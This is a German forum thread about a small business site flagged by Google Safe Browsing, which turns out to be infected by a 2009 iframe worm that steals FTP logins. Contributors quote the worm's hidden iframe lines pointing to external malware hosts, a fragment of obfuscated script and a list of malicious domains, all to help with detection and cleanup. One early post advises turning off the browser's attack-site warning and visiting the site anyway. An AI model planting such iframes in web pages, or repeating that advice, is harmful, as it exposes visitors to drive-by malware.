Webseite wird als virenverseucht gemeldet

Löschen [Heute, 20:11] Rally: https://www.google.com/webmasters/tools kennt er sich nicht aus ...
Löschen [Heute, 20:10] Rally: was kann man machen , den seine kunden haben die hose voll und geehn nicht auf die seite, scheint aber mit ein virenkenner zu tuen zu haben und bei
Löschen [Heute, 20:08] Rally: Hallo habe ein prob. meine freund seine hp soll ein virus haben .... http://www.hobbyceramics.be/

Ich habe jetzt extra auf Linux umgeschaltet, da ich dort andere Sicherheitseinstellungen im FF habe..

Angezeigt bekomme ich:

"
Als attackierend gemeldete Website
Die Website auf http://www.hobbyceramics.be wurde als attackierende Seite gemeldet und auf Grund Ihrer Sicherheitseinstellungen blockiert.

Attackierende Websites versuchen, Programme zu installieren, die private Informationen stehlen, Ihren Computer verwenden, um andere zu attackieren oder Ihr System beschädigen.

Manche Websites vertreiben bewusst Viren und ähnlich schädliche Software, aber viele Websites sind auch ohne das Wissen oder die Erlaubnis des Betreibers kompromittiert.
"

Begründung:
"
Wie ist die gegenwärtige Einstufung von http://www.hobbyceramics.be?

Diese Website ist als verdächtig eingestuft. Das Aufrufen dieser Website kann schädlich für Ihren Computer sein!

Ein Bestandteil dieser Website wurde in den letzten 90 Tagen 4 mal aufgrund verdächtiger Aktivitäten auf die Liste gesetzt.

Welche Befunde hat Google beim Besuch dieser Website festgestellt?

Bei 10 Seite(n) von insgesamt 13 Seiten dieser Website, die wir in den letzten 90 Tagen getestet haben, wurde festgestellt, dass Malware (Schadsoftware) ohne Einwilligung des Nutzers heruntergeladen und installiert wurde. Der letzte Besuch von Google auf dieser Website war am 2009-08-14 und verdächtiger Content wurde auf dieser Website zuletzt am 2009-08-14 gefunden.

Malicious software includes 6 trojan(s).

Die Malware wird in 2 Domain(s) gehostet, darunter x9y.ru/, 3b7.ru/.

This site was hosted on 1 network(s) including AS5432 (BELGACOM).

Hat diese Website als Überträger zur Weiterverteilung von Malware fungiert?

In den letzten 90 Tagen hat http://www.hobbyceramics.be anscheinend nicht als Überträger für die Infektion von Websites fungiert.

Hat diese Website Malware gehostet?

Nein, diese Website hat in den letzten 90 Tagen keine Malware gehostet.

Wie kam es zu dieser Einstufung?

Gelegentlich wird von Dritten bösartiger Code in legitime Websites eingefügt. In diesem Fall wird unsere Warnmeldung angezeigt.

Nächste Schritte:

* Zur vorherigen Seite zurückkehren.
* Falls Sie Eigner dieser Website sind, können Sie eine Überprüfung Ihrer Website mit den Google Webmaster-Tools anfordern. Weitere Informationen über den Prüfprozess erhalten Sie in der Hilfe für Webmaster.
"

DAS zu den aktuellen Fakten.

Die Warnung beruht allein auf den Sicherheitseinstellungen des Browsers.
Nicht das Antivirenprogramm meldet sie, sondern eine Datenbank mit der sich der Browser bereits vor Aufrufen der Seite in Verbindung setzt.

Die Kriterien und die Aktualisierung der Datenbank sind nicht wirklich ersichtlich.
Man kann nämlich eine Seite melden - was auch durchaus aus Konkurrenzneid geschehen kann.

Mittlerweile ist bekannt, dass Google Seiten als "Virenschleudern" kennzeichnet, wenn die Seite auf bestimmten russischen Servern erwähnt/verlinkt wurde oder jemand meldet, dass es eine irgendwie geartete Verlinkung dorthin gibt.

-------------------
Meine persönliche Empfehlung an User solcher betroffener Seiten:
1. automatische Überprüfung im Browser abschalten, ob weine Webseite als attackierend gemeldet wurde.
2. den eigenen AV und Firewall "scharf einstellen" und dann die Seite trotzdem besuchen.

WENN die Seite WIRKLICH Schadcode enthält, verlasse ich mich eher auf das eigene System als auf seltsame Datenbanken !!!

EDIT:
Spätere Erkenntnisse zeigen auf, dass es sich um einen Wurmcode handelt, der sich vorrangig an FTP-Programme hängt, die Kennwörter ausspioniert und sich dann selbst per FTP auf den Server installiert.
Betroffen sind sowohl iframes als auch java... deshalb bitte erst weiterlesen !!!
Edit 30.08.09 by BigJohn
---
Meinen Empfehlung an Seiteninhaber:
http://www.google.com/support/…in/answer.py?answer=45432

Sofern man sich bei den Webmastertools anmeldet, kann man eine Überprüfung der Seite veranlassen und bekommt auch weitere Möglichkeiten und Hilfen.

meine "Schutzprogramme" haben mir unter Windows keinerlei Gefahren beim Aufruf der Seite http://www.hobbyceramics.be/ signalisiert.

Vielen Dank @ Rally.

Der User Phantastor hat die Malware im Code ausfindig gemacht.
Die Malware ist also nicht wirklich auf der Seite vorhanden, sondern die Malwareseite wird per iframe in die eigene Seite eingebunden !

Die Seite wurde also entweder
-angegriffen und verändert
oder
-man hat ein seltsames Werbe-iFrame zugelassen

---------------------

Der User "Phantastor" hat die gleiche Einstellung wie ich:
Ein einziges AV-Programm genügt nicht - auch wenn die AV-Hersteller anders argumentieren.

Google blockt die Seiten ja nicht.
Google schreibt in eine Datenbank, dass sie dort Malware gefunden hat.

Und die Browser greifen auf diese Datenbank zu.
Schuld ist also vorrangig der Browserhersteller, dass er nur allein auf die Google-Datenbank zugreift und nicht auf eine Vielzahl anderer.

Du hast gesehen, dass ich den Link aus deinem Beitrag editiert habe.
Das habe ich gemacht, damit keiner irrtünmlich oder aus Neugierde darauf klickt.

Danke dir Rally

Einer der Gründe, weshalb ich keine Werbung laufen habe und auch diverse Codeingaben automatisch unterbunden werden.

In deinem Link wird hauptsächlich das gleiche Problem besprochen.
Es werden die verursachenden Codes genannt.

Es wird aber auch erwähnt, wie sich der Code einschmuggeln konnte

Zitat

How did the worm inject the hidden iframes to my files?

There are two ways through which the worm is believed to infect your files:

1) Server is compromised

This is the most common way. Some o the websites residing in the same web server as your website may be compromised (o it may be some vulnerabilities in your web application itself) that caused the web server to be compromised. Once the server is compromised, the worm will spread to all the websites in the server.

2) Client side FTP

The worm resides in some/any of the client side PCs you use for accessing the ftp/control panel accounts of your hosting server.

When you type in the username and password for the ftp/control panel account, the worm silently reads the credentials, accesses your ftp account and infects the files in the server. It adds the above mentioned code to all index.* files.

Alles anzeigen

1) Der Server ist kompromittiert/verseucht
Das ist der am Häufigsten vorkommende Fall. Man merkt es daran, dass nicht nur dein eigener Webspace betroffen ist, sodnern auch andere.
Hat sich einmal so ein Code auf dem Server eingenistet, breitet er sich über alle Webspaces aus.

2) Der eigene Rechner ist verseucht
Es gibt Würmer, die still deine Passwörter und Zugänge für den FTP mitlesen, auf den Server gehen und ihn infizieren. Er fügt dann den Wurmcode in alle index.* - Files ein.
-----
soweit diese Diskussion.

Für mich bedeutet das: Weg vom Server !!!
Wenn der Betreiber meint, es wäre Usersache, den Server zu reinigen, sollte man ihn allein lassen. Es ist schließlich sein Job !
Dein Bekannter hat nur einen Webspace gemietet und ist deshalb nicht für den gesamten Server verantwortlich.

Nachdem ich jetzt selbst weiß, wie sich der Wurm ausbreitet, habe ich meine letztens hochgeladenen Indexes mit einem Editor geöffnet.
Da ich dort nur HTML verwendet habe, konnte ich zum Glück leicht feststellern, dass keine iframes eingebaut wurden .. Glück gehabt *lach*

--------------------------------

Zu dem angeblichen Code, der den Wurm auf dem Server beseitigen soll:
Finger weg, wenn du nicht weißt woraus er besteht. Er kostet 10 USD.. könnte leider eine Abzocke sein.

außerdem: das Script soll nur das automatisieren, was du auch per Hand machen kannst:

nämlich folgenden Code in jeder index.*-Datei durch ein Leerzeichen zu ersetzen

Zitat

<iframe src=\”http://[^"]*” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>

echo \”<iframe src=\\\”http://[^"]*\” width=1 height=1 style=\\\”visibility:hidden;position:absolute\\\”></iframe>\”;

Du brauchst den php-Code also nicht.

==============================================================================================
Die Abwehrmaßnahmen lauten in Kurzform:

1. PC mit einem AV überprüfen lassen (im Artikel wurde Avast empfohlen)
2.Alle Zugangskennungen für den Webspace und FTP ändern
3.Alle Dateien vom Server auf den PC laden und den Wurmcode entfernen.
PS: ich würde jetzt erneut den PC mit einem AV überprüfen lassen
4.Hoster informieren, damit eine Ausbreitung verhindert werden kann

Man kann sehen, was Google in seiner Datenbank über eine Seite gespeichert hat, indem man folgenden Link aufruft:
http://www.google.com/safebrow…site=http://Seitenname.de
("Seitenname.de" durch den Namen der Seite ersetzen)

==========================================================================
Folgende Codes sind weiterhin Wurmcodes:

Zitat

<iframe src=”http://hostverify.net/?click=2730375″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

<iframe src=”http://hosttracker.net/?click=32431937″ width=1 height=1 style=”visibility:hidden;position:absolute”>

Zitat

<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){… etc.

Diese Server hosten den Wurmcode

Zitat

gumblar.cn
martuz.cn
beladen.net
38zu.cn
googleanalytlcs.ne
lousecn.cn
fqwerz.cn
d99q.cn
orgsite.info
94.247.2.0
94.247.2.195
mmsreader.com
google-ana1yticz.com
my2.mobilesect.info
thedeadpit.com
internetcountercheck.com
165.194.30.123
ruoo.info
gogo2me.net/
live-counter.net
klinoneshoes.info
protection-livescan.com/
webexperience13.com
q5x.ru

Alles anzeigen

Wer diese Adressen in seiner index findet, kann sicher sein, dass sie den Wurmcode enthält.

Achtung: Dieses ist nur eine sinngemäße Übersetzung gewesen.

Es geht weiter......... mit einer anderen Seite

... Fortsetzung

Die Codeprogrammierer benutzen jetzt auch MD5 um einen javascript Wurm Code einzubauen !!!
Diese verweisen auf

Zitat

xtrarobotz .com
live-counter .net
hyperliteautoservices .cn
namebuypicture .cn
superbetfair .cn

Das Script zielt allein auf User-FTP-Applikationen !

Quelle: http://www.sulumitsretsambew.org/iframe-worms/

ÜBRIGENS....
im Teil 1 wurde erwähnt, dass nur die INDEX-Files betroffen wären.
Auf einer anderen Seite habe ich erfahren, dass auch Dateien verseucht werden, die folgende Namen enthalten:
* main
* default
* index
* home

Ein Trojaner wurde gefunden, der den Wurm verbreitet.
Dieser nistet sich unter Programme/Adobe/Acrobat/Reader/ActiveX ein

Er tarnt sich als Datei namens "AcroIEhelper.dll", Findet man diese Datei, kann man sicher sein, dass der eigene PC verseucht ist.

Quelle:http://www.qualitycodes.com/tutorial.php?articleid=29

Diese Seite bietet übrigens ein kostenloses Script an, das man auf den Server hochladen kann um die verseuchten Dateien zu finden.
Den Code kann man unter http://www.qualitycodes.com/tu…Misc/virus-detect.php.txt sehen.

PS: wer den Code von der Seite lädt: Vor dem Upload die Downloaddatei "virus-detect.php.txt" in "virus-detect.php" umbenennen

Die Hackalarmseite bietet einen kostenlosen Test an.
http://www.hackalarm24.com/fro…ckextern.html&groupId=200

So schnell wie der geht ... vor allem sagt er nichts über die Quelle aus. Das ergebnis lautet z.B. "OK: Keine Spuren erfolgreicher Hackattacken gefunden! "
Da sagt die Googlesuche doch schon mehr aus

Hackalarm24 ist ansonsten eine kommerzielle Seite aus Österreich, die ihre Dienste verkaufen möchte.
Sie bietet auch eine "Notrufnummer" an.
Österreich: 0900 / 520006 (2,17 Euro/min)
Deutschland: 0900 / 1900330 (2,00 Euro/min)

@ Rally
Leider lassen sich Webseiten nicht gegen Viren und Codes impfen.

Man kann immer nur "nacharbeiten" -
ooder - man muss die CMOD-Rechte eben nur auf lesen setzen... was bei Foren usw. leider die Funktion einschränkt oder komplett verhindert.

Es handelt sich bei diesem Code um einen Floodschutz, der gegen Brute Force und DDoS Attacken helfen soll.

Der Wert >10 ist in der Hinsicht kritisch, als dass dadurch sehr viele Besucher mit FF+bestimmten Plugins ausgeschlossen werden.
Er ist nach heutigem Standard (wegen RSS+Atom Feeds) zu niedrig angesetzt.

WBB-Foren wird dieser Schutz als fertiges Plugin kostenlos geliefert: "Secuyrity System Basic" (erhältlich in der WLcomm)
Bei phpBB.Foren ist er bereits eingebaut.

Für diese Forentypen würde das Script nicht nurunnötig, sondern auch durchaus kontraproduktiv sein, da die internen Möglichkeiten einfacher zu bedienen sind und auch mehr Informationen bieten.
Zudem würde das Zusatzscript auch gegen die Forenfunktion arbeiten.